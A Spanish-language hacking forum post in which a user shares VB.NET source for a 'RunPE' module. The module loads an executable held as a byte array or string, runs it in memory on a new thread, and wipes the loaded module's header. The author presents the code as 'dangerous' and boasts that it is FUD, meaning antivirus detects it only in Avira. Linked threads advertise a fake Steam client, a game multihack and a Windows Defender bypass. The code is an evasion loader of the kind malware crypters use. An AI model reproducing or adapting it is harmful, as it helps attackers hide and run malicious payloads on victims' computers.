[SOURCE] RunPE VB.NET

  • 0 Respuestas
  • 168 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 684
  • Actividad:
    43.33%
  • Reputación 15
  • 4 Esquinas
  • Skype: [email protected]
    • Ver Perfil
    • Doors.Party
    • Email

[SOURCE] RunPE VB.NET

  • en: Febrero 06, 2020, 01:53:11 pm
HOLA!!!

Esta vez no les traigo una tool de hacking en si misma, sino algo mucho mas... peligroso Jajaja.

Esto que veremos aqui es un codigo completo para ubicar en un Modulo de nuestro proyecto de VB.NET con la capacidad de ejecutar en memoria un archivo EXE (o cualquier otro ejecutable con estructura PE) que anteriormente hayamos convertido en un byte array o bien un string que contenga el byte array.

Este codigo aparte de tener el clasico RunPE posee un pequeño snippet que permite convertir un string en un byte array, para los curiosos les recomiendo experimentar con esa funcion.

Ahora nos vamos al codigo:
Código: vb.net
  1. 'By 79137913 for Underc0de
  2. 'Thanks to ANTRAX
  3.  
  4. Imports System.Reflection
  5. Imports System.Runtime.InteropServices
  6. Imports System.Security
  7. Imports System.Threading
  8.  
  9. Module PE79137913
  10.     <DllImport("kernel32.dll")>
  11.     Private Sub RtlZeroMemory(ByVal address As IntPtr, ByVal size As Integer)
  12.     End Sub
  13.     <SuppressUnmanagedCodeSecurity>
  14.     Private Delegate Function ExecuteAssembly(ByVal sender As Object, ByVal parameters As Object()) As Object
  15.  
  16.     'Llama esta funcion para ejecutar tu exe convertido a Byte Array.
  17.     Sub Ejecutar(ByVal buffer As Byte())
  18.         Dim Llave As Integer = BitConverter.ToInt32(buffer, 60)
  19.         buffer(Llave + 920) = CByte(2)
  20.         Dim ParametrosEx As Object() = Nothing
  21.         Dim Ejecutable As Assembly = Thread.GetDomain().Load(buffer)
  22.         Dim PuntoDeEntrada As MethodInfo = Ejecutable.EntryPoint
  23.         If PuntoDeEntrada.GetParameters().Length > 0 Then
  24.             ParametrosEx = New Object() {New String() {Nothing}}
  25.         End If
  26.  
  27.         Dim HiloDeEjecucion As Thread = New Thread(
  28.             Sub()
  29.                 Thread.BeginThreadAffinity()
  30.                 Thread.BeginCriticalRegion()
  31.                 Dim EjecutarEjecutable As ExecuteAssembly = New ExecuteAssembly(AddressOf PuntoDeEntrada.Invoke)
  32.                 EjecutarEjecutable(Nothing, ParametrosEx)
  33.                 Thread.EndCriticalRegion()
  34.                 Thread.EndThreadAffinity()
  35.             End Sub
  36.             )
  37.  
  38.         If ParametrosEx IsNot Nothing Then
  39.             If ParametrosEx.Length > 0 Then
  40.                 HiloDeEjecucion.SetApartmentState(ApartmentState.MTA)
  41.             Else
  42.                 HiloDeEjecucion.SetApartmentState(ApartmentState.STA)
  43.             End If
  44.         End If
  45.         RtlZeroMemory(Marshal.GetHINSTANCE(Ejecutable.ManifestModule), 32)
  46.         HiloDeEjecucion.Start()
  47.     End Sub
  48.  
  49.     'Usa esta funcion para ejecutar tu exe en forma de String
  50.     Sub Ejecutar(ByVal strBuffer As String)
  51.         Dim Buffer As Byte() = StrToByte(strBuffer)
  52.         Ejecutar(Buffer) 'Ejecuta la cadena de texto convertida a Byte Array
  53.     End Sub
  54.  
  55.     'Funcion auxiliar para convertir el String en un Byte Array
  56.     Private Function StrToByte(ByVal buffer As String) As Byte()
  57.         Dim ByteBufferEx As Byte() = New Byte(buffer.Length - 1) {}
  58.         For i As Integer = 0 To buffer.Length - 1
  59.             ByteBufferEx(i) = CByte(Solo los usuarios pueden ver los links. Registrate o Ingresar(buffer(i)))
  60.         Next
  61.         Return ByteBufferEx
  62.     End Function
  63. End Module

P.D.: El presente codigo es [FUD] al dia de la fecha, no se cuanto dure, pero por ahora solo lo detecta avira. Disfruten!

GRACIAS POR LEER!!!
« Última modificación: Febrero 17, 2020, 03:44:12 pm por 79137913 »
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   Solo los usuarios pueden ver los links. Registrate o Ingresar

 

[SOURCE] Fake Steam (Steam v2.70.82.9)

Iniciado por Elektro

Respuestas: 0
Vistas: 2200
Último mensaje Mayo 12, 2015, 11:22:33 am
por Elektro
[SOURCE-CODE] Color.NET - Color Picker

Iniciado por Aincrad

Respuestas: 0
Vistas: 2509
Último mensaje Noviembre 15, 2018, 11:23:02 pm
por Aincrad
[SOURCE-CODE] Point Blank MultiHack . Incluye Bypass al X-trap

Iniciado por Aincrad

Respuestas: 0
Vistas: 2917
Último mensaje Junio 01, 2018, 09:00:39 pm
por Aincrad
[SOURCE] REG2BAT (Convierte archivos de Registro a scripts Batch)

Iniciado por Elektro

Respuestas: 0
Vistas: 2780
Último mensaje Mayo 12, 2015, 11:28:41 am
por Elektro
[SOURCE] Deshabilitar Windows defender en tiempo de ejecucion[VB.NET WD BYPASS]

Iniciado por 79137913

Respuestas: 4
Vistas: 2659
Último mensaje Junio 06, 2019, 04:43:03 pm
por 79137913